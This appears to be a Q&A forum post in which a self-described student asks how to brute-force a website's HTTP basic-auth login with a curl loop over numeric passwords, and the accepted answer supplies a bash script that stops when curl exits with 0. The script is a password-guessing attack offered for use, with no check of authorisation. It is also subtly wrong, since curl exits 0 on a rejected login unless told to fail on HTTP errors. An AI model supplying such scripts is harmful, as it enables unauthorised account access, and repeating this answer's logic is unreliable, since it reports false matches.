# How can I login to a website from terminal?

Tags: curl

As a student of computer science, I am now learning to work with command line.
I need  to use brute force to login to a website, knowing the username and that the password is an integer in  a certain range. This is what I have so far but it doesn't seem to work.

```
 for i in {2000..3000}; do curl http://admin:$i@mywebsite.com/link; done
```

How can I proceed?

Answer (score 6, accepted):

What your routine is lacking is some way to exit once the correct `i` is found.
For that you can look at the exit code given back from curl:

```
for i in {2000..3000}
do 
  curl http://admin:$i@mywebsite.com/link
  if [ "$?" -eq 0 ]; then
    echo Found "$i"
    break
  fi
done
```

The exit value of `curl` is 0 when everything is correct and can be checked directly after the program stops by inspecting the special variable `$?`.
Use `man curl` and search for `EXIT CODE` to see all the different things `curl` can tell you with its exit code.